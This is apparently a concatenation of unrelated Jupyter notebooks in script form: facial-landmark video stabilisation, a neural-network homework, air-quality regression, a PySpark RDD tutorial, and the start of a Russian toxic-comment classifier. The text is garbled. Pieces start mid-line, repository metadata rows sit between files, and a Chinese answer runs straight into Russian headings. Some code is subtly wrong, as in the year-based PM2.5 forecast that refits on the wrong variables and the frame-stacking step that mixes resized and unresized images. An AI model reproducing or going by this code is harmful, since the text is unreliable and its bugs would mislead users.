    # Resize image for faster face detection
    imSmall = cv2.resize(im, None, fx=1.0/IMAGE_RESIZE, fy=1.0/IMAGE_RESIZE,interpolation = cv2.INTER_LINEAR)
    imSmallDlib = cv2.cvtColor(imSmall, cv2.COLOR_BGR2RGB)
    # Skipping the frames for faster processing
    if (count % SKIP_FRAMES == 0):
        faces = detector(imSmallDlib,0)
    # If no face was detected
    if len(faces)==0:
        print("No face detected")
    else:
        for i in range(0,len(faces)):
            print("face detected")
            # Face detector was found over a smaller image.
            # So, we scale face rectangle to correct size.
            newRect = dlib.rectangle(int(faces[i].left() * IMAGE_RESIZE),
                                     int(faces[i].top() * IMAGE_RESIZE),
                                     int(faces[i].right() * IMAGE_RESIZE),
                                     int(faces[i].bottom() * IMAGE_RESIZE))
            # Detect landmarks in current frame
            landmarks = landmarkDetector(imDlib, newRect).parts()
            # Handling the first frame of video differently,for the first frame copy the current frame points
            if (isFirstFrame==True):
                pointsPrev=[]
                pointsDetectedPrev = []
                [pointsPrev.append((p.x, p.y)) for p in landmarks]
                [pointsDetectedPrev.append((p.x, p.y)) for p in landmarks]
            # If not the first frame, copy points from previous frame.
            else:
                pointsPrev=[]
                pointsDetectedPrev = []
                pointsPrev = points
                pointsDetectedPrev = pointsDetectedCur
            # pointsDetectedCur stores results returned by the facial landmark detector
            # points stores the stabilized landmark points
            points = []
            pointsDetectedCur = []
            [points.append((p.x, p.y)) for p in landmarks]
            [pointsDetectedCur.append((p.x, p.y)) for p in landmarks]
            # Convert to numpy float array
            pointsArr = np.array(points,np.float32)
            pointsPrevArr = np.array(pointsPrev,np.float32)
            # If eye distance is not calculated before, compute it once and
            # reuse it (it scales sigma, the LK window, and the dot radius).
            if eyeDistanceNotCalculated:
                eyeDistance = interEyeDistance(landmarks)
                print(eyeDistance)
                eyeDistanceNotCalculated = False
            if eyeDistance > 100:
                dotRadius = 3
            else:
                dotRadius = 2
            print(eyeDistance)
            # Gaussian falloff scale for the detection/tracking blend below.
            sigma = eyeDistance * eyeDistance / 400
            # Odd LK window size proportional to face scale.
            s = 2*int(eyeDistance/4)+1
            # Set up optical flow params
            lk_params = dict(winSize = (s, s), maxLevel = 5, criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 20, 0.03))
            pointsArr,status, err = cv2.calcOpticalFlowPyrLK(imGrayPrev,imGray,pointsPrevArr,pointsArr,**lk_params)
            # Converting to float
            pointsArrFloat = np.array(pointsArr,np.float32)
            # Converting back to list
            points = pointsArrFloat.tolist()
            # Final landmark points are a weighted average of
            # detected landmarks and tracked landmarks: when the detected
            # point barely moved (small d), trust the tracked point more.
            for k in range(0,len(landmarks)):
                d = cv2.norm(np.array(pointsDetectedPrev[k]) - np.array(pointsDetectedCur[k]))
                alpha = math.exp(-d*d/sigma)
                points[k] = (1 - alpha) * np.array(pointsDetectedCur[k]) + alpha * np.array(points[k])
            # Drawing over the stabilized landmark points (blue) or the raw
            # detected points (red), depending on showStabilized.
            if showStabilized is True:
                for p in points:
                    cv2.circle(im,(int(p[0]),int(p[1])),dotRadius, (255,0,0),-1)
            else:
                for p in pointsDetectedCur:
                    cv2.circle(im,(int(p[0]),int(p[1])),dotRadius, (0,0,255),-1)
    isFirstFrame = False
    count = count+1
    # Every NUM_FRAMES_FOR_FPS frames, refresh the FPS estimate and reset.
    if ( count == NUM_FRAMES_FOR_FPS):
        t = (cv2.getTickCount()-t)/cv2.getTickFrequency()
        fps = NUM_FRAMES_FOR_FPS/t
        count = 0
        isFirstFrame = True
    # Display the landmarks points
    cv2.putText(im, "{:.1f}-fps".format(fps), (50, size[0]-50), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0, 0, 255), 3,cv2.LINE_AA)
    #cv2.imshow(winName, im)
    #cv2_imshow(im)
    # key = cv2.waitKey(25) & 0xFF
    # # Use spacebar to toggle between Stabilized and Unstabilized version.
    # if key==32:
    #     showStabilized = not showStabilized
    # # Stop the program.
    # if key==27:
    #     sys.exit()
    all_stabilized_frames.append(im)
    # Getting ready for next frame
    imPrev = im
    imGrayPrev = imGray
# cv2.destroyAllwindows()
cap.release()
# + [markdown] id="-xFMlWBMcsiM" colab_type="text"
# # Display one of the stabilized and aligned image
# + id="cWPWFebIRrCG" colab_type="code" outputId="f3a9a34b-22f2-4625-db90-ba7dba7f7477" colab={"base_uri": "https://localhost:8080/", "height": 390}
plt.imshow(all_stabilized_frames[17][:,:,::-1])
plt.title("Stabilized Image")
plt.show()
# + [markdown] id="2Qp6U4qHcxcX" colab_type="text"
# # save the stabilized and aligned images to gdrive
# + id="EOUUv1RaSdSr" colab_type="code" colab={}
all_stabilized_frames.insert(0, all_stabilized_frames[0])
# + id="SKHCs9d4bD4I" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/stablize')
# + id="PTLXkGQ7bReW" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/stablize/', 'stablize_face', all_stabilized_frames)
# + [markdown] id="mFogCc6nc2nG" colab_type="text"
#
# + id="E4RtjS7tbgXt" colab_type="code" outputId="94b9e586-272f-4a72-ad8e-3abc95aaf220" colab={"base_uri": "https://localhost:8080/", "height": 1000}
pathIn= '/content/drive/My Drive/EVA-18/test/stablize/'
pathOut = '/content/drive/My Drive/EVA-18/videos/stable.mp4'
fps = 10.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="LvIyiZ6_dSg8" colab_type="text"
# # Create a list of images
# + id="uhfxQPCS1kGc" colab_type="code" colab={}
def read_all_images(dir, filename_prefix, num_files):
    """Load '<prefix>_0.png' ... '<prefix>_<num_files-1>.png' from *dir*.

    Returns the images as a list in index order (an entry is None when
    cv2.imread cannot read the file, matching cv2's behaviour).
    """
    paths = (os.path.join(dir, '{}_{}.png'.format(filename_prefix, idx))
             for idx in range(num_files))
    return [cv2.imread(p) for p in paths]
# + [markdown] id="o5EHa8AGdU81" colab_type="text"
# # Create variables to each of the
# 1. Original Image
# 2. Aligned unstabilized image
# 3. Aligned stabilized image
#
# + id="uIB-zSNI4d75" colab_type="code" colab={}
original_frames = read_all_images('/content/drive/My Drive/EVA-18/test/original', 'frame', 114)
# + id="m8KN7K0z4sOW" colab_type="code" colab={}
aligned_frames = read_all_images('/content/drive/My Drive/EVA-18/test/aligned_face', 'align_face', 114)
# + id="c9FBTka75WSC" colab_type="code" colab={}
stable_frames = read_all_images('/content/drive/My Drive/EVA-18/test/stablize', 'stablize_face', 114)
# + id="3cjiyLBW5gWi" colab_type="code" outputId="5f223834-a89a-47c5-bc0e-977f3a4b765a" colab={"base_uri": "https://localhost:8080/", "height": 72}
print(original_frames[0].shape)
print(aligned_frames[0].shape)
print(stable_frames[0].shape)
# + [markdown] id="eU5hijUkddXz" colab_type="text"
# # Resize the images
# + id="9TRyBdkq5jjD" colab_type="code" colab={}
def resize_images(imageList, width, height):
    """Return a new list with every image resized to width x height.

    Uses INTER_AREA interpolation, the recommended mode for shrinking.
    """
    target = (width, height)
    return [cv2.resize(img, target, interpolation=cv2.INTER_AREA)
            for img in imageList]
# + id="RYP2MvIO5vCl" colab_type="code" colab={}
orig_frames_resized = resize_images(original_frames, 600, 600)
# + id="CWSA2l6r6GiX" colab_type="code" outputId="98b860cf-270a-44b0-aeb8-850ad54376d4" colab={"base_uri": "https://localhost:8080/", "height": 35}
orig_frames_resized[0].shape
# + id="7Ta6zMZ06pxO" colab_type="code" colab={}
aligned_frames_resized=resize_images(aligned_frames,600,600)
# + id="GQm_B0rk8R_p" colab_type="code" outputId="9e61eeba-eda7-42c3-8ecc-577cdb9bd69d" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(orig_frames_resized)
# + id="VvNtp4si8jr1" colab_type="code" outputId="01e573ad-a9d0-47f1-efd7-507fd612cead" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(aligned_frames_resized)
# + id="1FcnjUrqApSG" colab_type="code" outputId="fc1e8198-cab1-4cd6-9b30-adaa836c8ea1" colab={"base_uri": "https://localhost:8080/", "height": 35}
np.shape(stable_frames)
# + id="r1PBhnbtAs3O" colab_type="code" colab={}
stable_frames_resized=resize_images(stable_frames,600,600)
# + [markdown] id="FZQW5WdQdh6t" colab_type="text"
# # Concatenate all the images side by side
# 1. Now the size of each image is 1200x400 ( 3 * 400 x 400 )
# 2. Convert the images int video
# + id="T7K3R17E5zMn" colab_type="code" colab={}
new_frames = []
for cnt in range(0, len(orig_frames_resized)):
new_img = np.hstack((orig_frames_resized[cnt], aligned_frames_resized[cnt], stable_frames[cnt]))
new_frames.append(new_img)
# + [markdown] id="1udRfKxFdkJ-" colab_type="text"
# # Display one of the images
# + id="Z50-krxz55tb" colab_type="code" outputId="03b56e45-b4a9-4323-821e-22dbbc423858" colab={"base_uri": "https://localhost:8080/", "height": 181}
plt.imshow(new_frames[27][:,:,::-1])
# + [markdown] id="kTjwrXz3dnFW" colab_type="text"
# # Save it to drive
# + id="hIpZTe9BBnhJ" colab_type="code" colab={}
os.mkdir('/content/drive/My Drive/EVA-18/test/final/')
# + id="aL1k_HMsDNcS" colab_type="code" colab={}
save_all_images('/content/drive/My Drive/EVA-18/test/final/', 'final', new_frames)
# + [markdown] id="tLbfqgiCdqCt" colab_type="text"
# # Convert to video file
# + id="7k_upS3_DWHf" colab_type="code" outputId="f4172d3c-b533-4335-e7c5-913f24381399" colab={"base_uri": "https://localhost:8080/", "height": 1000}
from os.path import isfile, join
def convert_frames_to_video(pathIn, pathOut, fps):
    """Assemble every frame image found in *pathIn* into a DIVX video.

    pathIn  -- directory containing '<prefix>_<index>.png' frames
    pathOut -- output video file path
    fps     -- playback frame rate

    Fix: frames are now sorted by their numeric index. The bare
    os.listdir() ordering (the sort was commented out because its key was
    wrong for these filenames) interleaves e.g. frame_2 and frame_20 and
    scrambles the video.
    """
    files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
    # Sort on the integer between the last '_' and the extension.
    files.sort(key=lambda name: int(os.path.splitext(name)[0].rsplit('_', 1)[1]))
    frame_array = []
    size = None
    for name in files:
        filename = join(pathIn, name)
        # reading each file
        img = cv2.imread(filename)
        height, width, layers = img.shape
        size = (width, height)
        print(filename)
        # inserting the frames into an image array
        frame_array.append(img)
    out = cv2.VideoWriter(pathOut, cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
    for frame in frame_array:
        # writing to the video file
        out.write(frame)
    out.release()
pathIn= '/content/drive/My Drive/EVA-18/test/final/'
pathOut = '/content/drive/My Drive/EVA-18/videos/finalvid.mp4'
fps = 30.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="tqxgFjH-dsuB" colab_type="text"
# Summary
# --------
#
# The converted video is uploaded to youtube. Please see the link under readme
# + id="SqxB73YUICTE" colab_type="code" colab={}
# + id="vtSOkfDVd16p" colab_type="code" colab={}
_val)==y_val))
clear_output()
print("Epoch",epoch)
print("Train accuracy:",train_log[-1])
print("Val accuracy:",val_log[-1])
plt.plot(train_log,label='train accuracy')
plt.plot(val_log,label='val accuracy')
plt.legend(loc='best')
plt.grid()
plt.show()
# + [markdown] id="f5Gzol_dA0eX"
# # Увеличим количество нейронов для трехслойной сети
# + id="qHJemsieBH-9"
# Build a deeper MLP: input -> 200 -> 400 -> 800 -> 10 output classes.
# ReLU activations after the first two hidden layers and Tanh before the
# output layer (Dense/ReLU/Tanh are the project-defined layer classes).
network = []
network.append(Dense(X_train.shape[1],200))
network.append(ReLU())
network.append(Dense(200,400))
network.append(ReLU())
network.append(Dense(400,800))
network.append(Tanh())
network.append(Dense(800,10))
# + id="TJC4sYsoBIPx"
train_log = []
val_log = []
# + colab={"base_uri": "https://localhost:8080/", "height": 316} id="Kz3jqtuTBId7" outputId="8726c0ac-0a04-4050-ef7e-735920e35e4c"
# Train for 25 epochs of shuffled minibatch updates, logging train/val
# accuracy after each epoch and redrawing the accuracy curves in place.
for epoch in range(25):
    for x_batch,y_batch in iterate_minibatches(X_train,y_train,batchsize=32,shuffle=True):
        train(network,x_batch,y_batch)
    # Full-dataset accuracies for this epoch (mean of exact-match predictions).
    train_log.append(np.mean(predict(network,X_train)==y_train))
    val_log.append(np.mean(predict(network,X_val)==y_val))
    # Clear the previous plot so the notebook shows a single updating figure.
    clear_output()
    print("Epoch",epoch)
    print("Train accuracy:",train_log[-1])
    print("Val accuracy:",val_log[-1])
    plt.plot(train_log,label='train accuracy')
    plt.plot(val_log,label='val accuracy')
    plt.legend(loc='best')
    plt.grid()
    plt.show()
# + [markdown] id="a5bmOU5W4wHH"
# ### Peer-reviewed assignment
#
# Congradulations, you managed to get this far! There is just one quest left undone, and this time you'll get to choose what to do.
#
#
# #### Option I: initialization
# * Implement Dense layer with Xavier initialization as explained [here](http://bit.ly/2vTlmaJ)
#
# To pass this assignment, you must conduct an experiment showing how xavier initialization compares to default initialization on deep networks (5+ layers).
#
#
# #### Option II: regularization
# * Implement a version of Dense layer with L2 regularization penalty: when updating Dense Layer weights, adjust gradients to minimize
#
# $$ Loss = Crossentropy + \alpha \cdot \underset i \sum {w_i}^2 $$
#
# To pass this assignment, you must conduct an experiment showing if regularization mitigates overfitting in case of abundantly large number of neurons. Consider tuning $\alpha$ for better results.
#
# #### Option III: optimization
# * Implement a version of Dense layer that uses momentum/rmsprop or whatever method worked best for you last time.
#
# Most of those methods require persistent parameters like momentum direction or moving average grad norm, but you can easily store those params inside your layers.
#
# To pass this assignment, you must conduct an experiment showing how your chosen method performs compared to vanilla SGD.
#
# ### General remarks
# _Please read the peer-review guidelines before starting this part of the assignment._
#
# In short, a good solution is one that:
# * is based on this notebook
# * runs in the default course environment with Run All
# * its code doesn't cause spontaneous eye bleeding
# * its report is easy to read.
#
# _Formally we can't ban you from writing boring reports, but if you bored your reviewer to death, there's no one left alive to give you the grade you want._
#
#
# ### Bonus assignments
#
# As a bonus assignment (no points, just swag), consider implementing Batch Normalization ([guide](https://gab41.lab41.org/batch-normalization-what-the-hey-d480039a9e3b)) or Dropout ([guide](https://medium.com/@amarbudhiraja/https-medium-com-amarbudhiraja-learning-less-to-learn-better-dropout-in-deep-machine-learning-74334da4bfc5)). Note, however, that those "layers" behave differently when training and when predicting on test set.
#
# * Dropout:
# * During training: drop units randomly with probability __p__ and multiply everything by __1/(1-p)__
# * During final predicton: do nothing; pretend there's no dropout
#
# * Batch normalization
# * During training, it substracts mean-over-batch and divides by std-over-batch and updates mean and variance.
# * During final prediction, it uses accumulated mean and variance.
#
| 30,750 |
/PySparkDemos/LearningPySpark_Chapter02.ipynb
|
858ace32bbdbbb422ba9e3b0808b7151369f88cd
|
[
"MIT"
] |
permissive
|
JiaqiLiu/ScalableML
|
https://github.com/JiaqiLiu/ScalableML
| 1 | 0 | null | 2018-11-01T00:58:02 | 2018-10-30T15:16:10 | null |
Jupyter Notebook
| false | false |
.py
| 43,763 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
# -
#path = os.getcwd() #get the path of current working dir
print(os.listdir("/kaggle/input/air-quality-data-in-india")) #print the date file present in "../input"#importing necessary libraries
city_day= pd.read_csv("/kaggle/input/air-quality-data-in-india/city_day.csv" , low_memory=False)
pip install rfpimp
# Impute missing values: skip object (string) columns, mean-fill numeric ones.
for col in city_day.columns:
    if city_day[col].dtype != "O":
        city_day[col] = city_day[col].fillna(city_day[col].mean())
city_day['AQI_Bucket'] = city_day['AQI_Bucket'].fillna("Not Known")
city_day.head()
# +
df = pd.DataFrame(city_day)
df['Year'] = pd.DatetimeIndex(df['Date']).year
df['Month'] = pd.DatetimeIndex(df['Date']).month
df=df.groupby(['City','Year','Month'])[['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']].mean()
df=df.reset_index(['City','Year','Month'])
df
# +
cities = [1]
x = df[df.Month.isin(cities)][['City','PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']]
x
# -
features = ['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']
dff=x
dff
# +
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
dff_train, dff_test = train_test_split(dff, test_size=0.20)
dff_train = dff_train[features]
dff_test = dff_test[features]
X_train, y_train = dff_train.drop('AQI',axis=1), dff_train['AQI']
X_test, y_test = dff_test.drop('AQI',axis=1), dff_test['AQI']
# -
rf = RandomForestRegressor(n_estimators=100, n_jobs=-1)
rf.fit(X_train, y_train)
import rfpimp
imp = rfpimp.importances(rf, X_test, y_test)
# +
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(7, 3))
ax.barh(imp.index, imp['Importance'], height=0.8, facecolor='grey', alpha=0.8, edgecolor='k')
ax.set_xlabel('Importance score')
ax.set_title('Permutation feature importance')
ax.text(0.8, 0.15, 'aegis4048.github.io', fontsize=12, ha='center', va='center',
transform=ax.transAxes, color='grey', alpha=0.5)
plt.gca().invert_yaxis()
fig.tight_layout()
# -
from sklearn import linear_model
X = dff['PM2.5'].values.reshape(-1,1)
y = dff['AQI'].values
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
response = model.predict(X)
r2 = model.score(X, y)
# +
plt.style.use('default')
plt.style.use('ggplot')
fig, ax = plt.subplots(figsize=(8, 4))
ax.plot(X, response, color='k', label='Regression model')
ax.scatter(X, y, edgecolor='k', facecolor='grey', alpha=0.7, label='Data-Jan')
ax.set_ylabel('AQI', fontsize=14)
ax.set_xlabel('PM2.5', fontsize=14)
ax.text(0.8, 0.1, 'aegis4048.github.io', fontsize=13, ha='center', va='center',
transform=ax.transAxes, color='grey', alpha=0.5)
ax.legend(facecolor='white', fontsize=11)
ax.set_title('$R^2= %.2f$' % r2, fontsize=18)
fig.tight_layout()
# -
# Another, simpler method
# +
features = ['PM2.5']
target = 'AQI'
X = dff[features].values.reshape(-1, len(features))
y = dff[target].values
# -
print(X.shape)
print(y.shape)
# +
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
# -
model.coef_
model.intercept_
model.score(X, y)
# Done
#
# In Jan 2022 Pm2.5 will be ??
#
d=df.groupby(['Year'])[['PM2.5','AQI']].mean()
d=d.reset_index(['Year'])
d
# +
features = ['Year']
target = 'PM2.5'
X0 = d[features].values.reshape(-1, len(features))
y0 = d[target].values
# -
print(X0.shape)
print(y0.shape)
# +
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
# -
model.coef_
model.intercept_
model.score(X, y)
x_pred = np.array([2022])
x_pred = x_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
model.predict(x_pred)
# YAYY
# +
features = ['PM2.5']
target = 'AQI'
X = dff[features].values.reshape(-1, len(features))
y = dff[target].values
print(X.shape)
print(y.shape)
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
model.coef_
# -
model.score(X, y)
xq_pred = np.array([32.61652958])
xq_pred = xq_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
model.predict(xq_pred)
# We can extend on this, and draw a prediction line for all possible values of the feature. Reasonable real-life PM2.5 values range between [0, 100].
# +
x3_pred = np.linspace(0, 100,50) # 50 data points between 0 ~ 100
x3_pred = x3_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
y3_pred = model.predict(x3_pred)
# -
-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([\s]{1})([0-9\s]{2})([0-9\s]{1})' +
r'([0-9\s]{1})([0-9\s]{1})([0-9\s]{1})([\s]{33})([0-9\s]{3})([0-9\s]{1})([0-9\s]{1})')
#parsing starts. When parsing fails we just put a -99 there to indicated parsing failed in that row.
try:
rs = np.array(record_split.split(row))[selected_indices]
except:
rs = np.array(['-99'] * len(selected_indices))
return rs
# return record_split.split(row)
# Note: Defining pure python methods can slow down your application because Spark constantly needs to switch between Python interpreter and JVM. Whenver possible, we should you built-in python functions.
# Now, instead of using `lambda` we will use the `extractInformation(...)` method to split and convert our dataset.
data_from_file_conv = data_from_file.map(extractInformation)
data_from_file_conv.map(lambda row: row).take(1)
# ### Transformations
# #### .map(...)
# The method is applied to each element of the RDD: in the case for the `data_from_file_conv` dataset you can think of this as a transformation of each row.
data_2014 = data_from_file_conv.map(lambda row: int(row[16]))
data_2014.take(10)
# You can combine more columns.
data_2014_2 = data_from_file_conv.map(lambda row: (row[16], int(row[16])))
data_2014_2.take(10)
# #### .filter(...)
# The `.filter(...)` method allows you to select elements of your dataset that fit specified criteria.
data_filtered = data_from_file_conv.filter(lambda row: row[5] == 'F' and row[21] == '0')
data_filtered.count()
data_filtered
data_filtered.collect()
# #### .flatMap(...)
# The `.flatMap(...)` method works similarly to `.map(...)` but returns a flattened result instead of a list of lists.
data_filtered_flat = data_filtered.flatMap(lambda row: (row[16], int(row[16]) + 1))
data_filtered_flat.count()
data_filtered_flat.collect()
data_2014_flat = data_from_file_conv.flatMap(lambda row: (row[16], int(row[16]) + 1))
data_2014_flat.take(10)
data_2014_flat.count()
# #### .distinct()
# This method returns a list of distinct values in a specified column.
distinct_gender = data_from_file_conv.map(lambda row: row[5]).distinct().collect()
distinct_gender
# #### .sample(...)
# The `.sample()` method returns a randomized sample from the dataset.
# +
fraction = 0.01
#False, fraction, 666 = With raplecement? Fraction of dataset used to sampling, random seed
data_sample = data_from_file_conv.sample(False, fraction, 666)
data_sample.take(1)
# -
# Let's confirm that we really got 1% of all the records.
print('Original dataset: {0}, sample: {1}'.format(data_from_file_conv.count(), data_sample.count()))
# #### .leftOuterJoin(...)
# Left outer join, just like the SQL world, joins two RDDs based on the values found in both datasets, and returns records from the left RDD with records from the right one appended where the two RDDs match.
# +
rdd1 = sc.parallelize([('a', 1), ('b', 4), ('c',10)])
rdd2 = sc.parallelize([('a', 4), ('a', 1), ('b', '6'), ('d', 15)])
rdd3 = rdd1.leftOuterJoin(rdd2)
rdd3.take(5)
# -
# d is missing since this is only a leftOuterJoin
# If we used `.join(...)` method instead we would have gotten only the values for `'a'` and `'b'` as these two values intersect between these two RDDs.
rdd4 = rdd1.join(rdd2)
rdd4.collect()
# Another useful method is the `.intersection(...)` that returns the records that are *equal* in both RDDs.
rdd5 = rdd1.intersection(rdd2)
rdd5.collect()
# #### .repartition(...)
# Repartitioning the dataset changes the number of partitions the dataset is divided into.
# +
rdd1 = rdd1.repartition(4)
len(rdd1.glom().collect())
# -
rdd1.glom().collect()
# ### Actions
# #### .take(...)
# The method returns `n` top rows from a single data partition.
data_first = data_from_file_conv.take(1)
data_first
# If you want somewhat randomized records you can use `.takeSample(...)` instead.
data_take_sampled = data_from_file_conv.takeSample(False, 2, 667)
data_take_sampled
# #### .reduce(...)
# Another action that processes your data, the `.reduce(...)` method *reduces* the elements of an RDD using a specified method.
rdd1.collect()
rdd1.map(lambda row: row[1]).reduce(lambda x, y: x + y)
# If the reducing function is not associative and commutative you will sometimes get wrong results depending how your data is partitioned.
rdd1.map(lambda row: row[1]).reduce(lambda x, y: x / y)
data_reduce = sc.parallelize([1.0, 2.0, .5, .1, 5, .2], 1)
data_reduce.collect()
# If we were to reduce the data in a manner that we would like to *divide* the current result by the subsequent one, we would expect a value of 10
works = data_reduce.reduce(lambda x, y: x / y)
works
# However, if you were to partition the data into 3 partitions, the result will be wrong.
data_reduce = sc.parallelize([1.0, 2.0, .5, .1, 5, .2], 3)
data_reduce.reduce(lambda x, y: x / y)
# The `.reduceByKey(...)` method works in a similar way to the `.reduce(...)` method but performs a reduction on a key-by-key basis.
data_key = sc.parallelize([('a', 4),('b', 3),('c', 2),('a', 8),('d', 2),('b', 1),('d', 3)],4)
data_key.reduceByKey(lambda x, y: x + y).collect()
# #### .count()
# The `.count()` method counts the number of elements in the RDD.
data_reduce.count()
# It has the same effect as the method below but does not require shifting the data to the driver.
len(data_reduce.collect()) # WRONG -- DON'T DO THIS!
# If your dataset is in a form of a *key-value* you can use the `.countByKey()` method to get the counts of distinct keys.
data_key.countByKey().items()
# #### .saveAsTextFile(...)
# As the name suggests, the `.saveAsTextFile()` method saves the RDD to text files: each partition to a separate file.
data_key.saveAsTextFile('data_key.txt')
# To read it back, you need to parse it back as, as before, all the rows are treated as strings.
# +
def parseInput(row):
    """Parse a line like "('a', 4)" back into a (key, count) tuple.

    The file was written by saveAsTextFile, so each record is the str()
    of a (str, int) pair.
    """
    import re  # imported inside the function so it ships to Spark workers

    # [0-9]+ (not a single digit) so multi-digit counts round-trip correctly;
    # the original pattern failed on values >= 10.
    pattern = re.compile(r"\(\'([a-z])\', ([0-9]+)\)")
    row_split = pattern.split(row)
    return (row_split[1], int(row_split[2]))
data_key_reread = sc \
.textFile('data_key.txt') \
.map(parseInput)
data_key_reread.collect()
# -
# **.foreach(...)**
# A method that applies the same function to each element of the RDD in an iterative way.
# +
# this prints to terminal not to jupyter notebook!
def f(x):
    """Echo one RDD element to the worker's stdout (driver for RDD.foreach)."""
    print(x)
print('hi')
data_key.foreach(f)
# -
data_key.collect()
| 12,514 |
/Intermediate-version/PotentiometerRGB_IntensityControl.ipynb
|
3b0b181a1b1b51d2b999c63f9df857676ff029d3
|
[] |
no_license
|
namanPuri/Phycomm-Beginner-Intermediate-
|
https://github.com/namanPuri/Phycomm-Beginner-Intermediate-
| 0 | 1 | null | 2020-06-08T04:59:36 | 2020-05-29T06:25:02 | null |
Jupyter Notebook
| false | false |
.py
| 5,189 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 作業
# 請閱讀相關文獻,並回答下列問題
# 脊回歸 (Ridge Regression) Linear, Ridge, Lasso Regression 本質區別
# 1.LASSO 回歸可以被用來作為 Feature selection 的工具,請了解 LASSO 模型為什麼可用來作 Feature selection
#
# ans: The consequence of this is that ridge regression will tend to shrink the large weights while hardly shrinking the smaller weights at all. In LASSO regression, the shrinkage will be directly proportionate to the importance of the feature in the model.
# 2.當自變數 (X) 存在高度共線性時,Ridge Regression 可以處理這樣的問題嗎?
#
# ans: 可以
ская регрессия</a></span></li><li><span><a href="#Дерево-решений" data-toc-modified-id="Дерево-решений-2.2"><span class="toc-item-num">2.2 </span>Дерево решений</a></span></li><li><span><a href="#Случайный-лес" data-toc-modified-id="Случайный-лес-2.3"><span class="toc-item-num">2.3 </span>Случайный лес</a></span></li><li><span><a href="#CatBoostClassifier" data-toc-modified-id="CatBoostClassifier-2.4"><span class="toc-item-num">2.4 </span>CatBoostClassifier</a></span></li></ul></li><li><span><a href="#Выводы" data-toc-modified-id="Выводы-3"><span class="toc-item-num">3 </span>Выводы</a>
# -
# # Проект для интернет-магазина
# Создается новый сервис, в котором пользователи могут редактировать и дополнять описания товаров, как в вики-сообществах. То есть клиенты предлагают свои правки и комментируют изменения других. Магазину нужен инструмент, который будет искать токсичные комментарии и отправлять их на модерацию.
#
# Необходимо обучить модель классифицировать комментарии на позитивные и негативные. В нашем распоряжении набор данных с разметкой о токсичности правок.
#
#
# **Этапы выполнения проекта**
#
# 1. Загрузим и подготовим данные.
# 2. Обучим разные модели.
# 3. Сделаем выводы.
#
#
# **Описание данных**
#
# Столбец *text* в нём содержит текст комментария, а *toxic* — целевой признак.
# ## Подготовка
# Загрузим все используемые библиотеки
# +
import pandas as pd
import numpy as np
import re
from pymystem3 import Mystem
from nltk.stem import WordNetLemmatizer
from sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV
from sklearn.metrics import f1_score, make_scorer
from sklearn.feature_extraction.text import TfidfVectorizer
from nltk.corpus import stopwords
import nltk
from nltk.corpus import wordnet
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from catboost import CatBoostClassifier
import warnings
warnings.filterwarnings('ignore')
# -
data = pd.read_csv('/datasets/toxic_comments.csv')
# Посмотрим на наши данные
data
# Проверим на наличие дубликатов.
data.duplicated().value_counts()
# Узнаем, есть какое соотношение отрицательных и положительных отзывов
# Relative frequency of each class. normalize expects a bool; the original
# passed a float (2 / len(...)), which pandas merely treated as truthy.
class_frequency = pd.Series(data['toxic']).value_counts(normalize=True)
class_frequency
# Чтож, дубликаты отсутствуют, а положительных отзывов наблюдается только 10%.<br>
# Чтобы эффективно обучить модель, в пункте деления на выборки задействуем параметр "stratify" для равномерного разделения на два кластера (наблюдения класса 0 и наблюдения класса 1).
# Теперь займемся предобработкой данных.<br>
# Очистим текст
# +
otziv = []
